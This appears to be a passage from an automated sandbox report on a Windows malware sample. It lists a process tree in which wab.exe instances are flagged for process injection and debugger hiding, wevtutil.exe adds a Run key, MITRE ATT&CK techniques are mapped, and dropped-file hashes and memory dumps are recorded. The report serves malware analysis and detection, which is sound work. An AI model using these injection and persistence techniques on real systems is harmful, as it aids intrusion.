      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1988
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Hagiographical.Pro && echo t"
        5⤵
        
        PID:1236
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe"
        5⤵
        
        PID:2872
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe"
        5⤵
        
        PID:3688
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe"
        5⤵
        
        PID:2556
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:1600
- C:\Windows\SysWOW64\wevtutil.exe
  "C:\Windows\SysWOW64\wevtutil.exe"
  2⤵
  - Adds policy Run key to start application
  - Suspicious use of SetThreadContext
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1236
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:3168

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Limitarian.txt

Filesize
3KB

MD5
caff5e6688be6b1374e02bcde2a6488c

SHA1
fd9916e8b73a966e66e958c62782a494bb8f277d

SHA256
e31369e7dac4f4beb10121d22da2927b1cd0d7a7ac3524b88ac1073bc85041aa

SHA512
95d9c4744e071dc9e338fb1421835ad44a7ed4353dd4fcdaa82ceba3d847b0e4eb6b0e64e2a19846588672ccfd895c0aa2a22c7fb1bd651f8a389e23782ed8cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Limitarian.txt

Filesize
373B

MD5
2ff487c7ebff103df2355ab130878905

SHA1
28a6ad151229133c909fcf2803e4ea82c87f2e01

SHA256
923573ab57130d15391abb54789d371d51f803da5405952d51fb9d5e9b945276

SHA512
d4a1ce70e80a4cde1dd9b5f7e58de2bb18c280f009c186ec542a6e32b1d73d3e9b19507b3658b722e363305205a73479ec5f921d2162a08cf62589f212f13406

Download Submit
C:\Users\Admin\AppData\Local\Temp\Limitarian.txt

Filesize
3KB

MD5
cf45674fa2e0645f62c36e8611a8bb0c

SHA1
85ead4d29dcb19d2107746bd838cef0b0b4ebd95

SHA256
366ad9721ab1814c2d03a6ac926a10d5aeb51197314f00324d5657f772864550

SHA512
796207d406ed5d8affc57bbd83ff298aea3518a51d038ad8d4b9fcce319b1e75c04a5af45bdb443328d1e8d9dfde894621862d48a98664da3ca3af709990877d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Limitarian.txt

Filesize
4KB

MD5
0ee83a1bd2631cfd663c8cd921046257

SHA1
93fdb2ebfd4ab5819f6822a0eb1ce3ab0aefc356

SHA256
32b82cff7017c353c7e5925d26d56ec5b19e76ec12aa173aeb32fe48cff8f0e7

SHA512
166aa05d8aef734edee2e992bc40dc3ae09c522d705ae2fa8c5292308f2bbfeae68e231e32fc82d7e2d50ee16c33d66ac587765d77053856a675fbd1f5b39381

Download Submit
C:\Users\Admin\AppData\Local\Temp\Limitarian.txt

Filesize
862B

MD5
78cc588ed281e96b25a5434fb17b8391

SHA1
f44ebbdb7fcb28ca76173b45b3f2d5c3555562aa

SHA256
23093ccb03e47868a3515d0830f12180e467828bf9dd344df5fefa04bb836ec6

SHA512
6918f20d70813755ebb86853e8021d05d2306646021c79f3170d8efb9cf928d0e5bff455083b173ee6c2308aa2e0d0f12710ba5bdb41f3a798bbb0f231ab968d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Limitarian.txt

Filesize
2KB

MD5
c83539fe8f087b38143b655bd0ef84e1

SHA1
383485574f654222547be2a88125f77c8c7373bf

SHA256
d8c44afdb16cf7064533a633ce2ce74b12dda97787875261279cdbcc3ba54651

SHA512
fba4cc93fd4b5993f45ba5550047ee8267475378ca7704415191fab7b950187db0461d1bdbb0c5feb841a9200a6c79f83bbe984a7893314c5f7614d145ff2fe1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Limitarian.txt

Filesize
2KB

MD5
7f90d05c0f5e55f6c2c23a2a10eec953

SHA1
cd2f0ea1108df65f37a2cda53d095448cd8d85f0

SHA256
62e27c55e169636e60dd5faf615ae9d1c57dfd12c11765d88a5f42f8e372147e

SHA512
d591b75fbd7e15823f61b54a6377ed7281cb62bf4f8782c1e986a39ce26bdc90fab9a1796f4fa6bd41170e8a451b0f1f84dd7c5bc41b5b76f63397c0e0d0e637

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wrtv3yrx.bdh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Hagiographical.Pro

Filesize
437KB

MD5
326a484e6a0f2f93827a82202f70e56b

SHA1
d2e924ca0a3208c80b2ed8d72208b512f6e9e4ca

SHA256
8957000b9a0cd9909dc3836377d886c592a0098e4eb7b10958139e7b394a0713

SHA512
ed1349cabf1d48cf192b0032e634d622cb0167832ca173872305eafc5342fb0c6e6221b6910e6667a4d09d4364ec48427ba0b1043db2c89a53f4fe79ce49f977

Download Submit
memory/1236-391-0x0000000001030000-0x000000000106F000-memory.dmp

Filesize
252KB

Download
memory/1236-389-0x0000000001030000-0x000000000106F000-memory.dmp

Filesize
252KB

Download
memory/1600-390-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1600-385-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1600-384-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1600-380-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1600-386-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1988-356-0x00000000063F0000-0x000000000640E000-memory.dmp

Filesize
120KB

Download
memory/1988-341-0x0000000002AE0000-0x0000000002B16000-memory.dmp

Filesize
216KB

Download
memory/1988-345-0x0000000005CB0000-0x0000000005D16000-memory.dmp

Filesize
408KB

Download
memory/1988-357-0x0000000006420000-0x000000000646C000-memory.dmp

Filesize
304KB

Download
memory/1988-358-0x0000000007C60000-0x00000000082DA000-memory.dmp

Filesize
6.5MB

Download
memory/1988-359-0x0000000006990000-0x00000000069AA000-memory.dmp

Filesize
104KB

Download
memory/1988-360-0x00000000076B0000-0x0000000007746000-memory.dmp

Filesize
600KB

Download
memory/1988-361-0x0000000007640000-0x0000000007662000-memory.dmp

Filesize
136KB

Download
memory/1988-362-0x0000000008890000-0x0000000008E34000-memory.dmp

Filesize
5.6MB

Download
memory/1988-344-0x0000000005C40000-0x0000000005CA6000-memory.dmp

Filesize
408KB

Download
memory/1988-364-0x0000000008E40000-0x0000000009EE9000-memory.dmp

Filesize
16.7MB

Download
memory/1988-355-0x0000000005DE0000-0x0000000006134000-memory.dmp

Filesize
3.3MB

Download
memory/1988-342-0x0000000005610000-0x0000000005C38000-memory.dmp

Filesize
6.2MB

Download
memory/1988-343-0x0000000005530000-0x0000000005552000-memory.dmp

Filesize
136KB

Download
memory/2124-383-0x00007FFB54EA0000-0x00007FFB55961000-memory.dmp

Filesize
10.8MB

Download
memory/2124-366-0x00007FFB54EA3000-0x00007FFB54EA5000-memory.dmp

Filesize
8KB

Download
memory/2124-367-0x00007FFB54EA0000-0x00007FFB55961000-memory.dmp

Filesize
10.8MB

Download
memory/2124-338-0x00007FFB54EA0000-0x00007FFB55961000-memory.dmp

Filesize
10.8MB

Download
memory/2124-337-0x00007FFB54EA0000-0x00007FFB55961000-memory.dmp

Filesize
10.8MB

Download
memory/2124-327-0x000002B5E4300000-0x000002B5E4322000-memory.dmp

Filesize
136KB

Download
memory/2124-326-0x00007FFB54EA3000-0x00007FFB54EA5000-memory.dmp

Filesize
8KB

Download
memory/3168-399-0x0000014BD14A0000-0x0000014BD15AE000-memory.dmp

Filesize
1.1MB

Download
memory/3544-392-0x0000000008E90000-0x0000000008F90000-memory.dmp

Filesize
1024KB

Download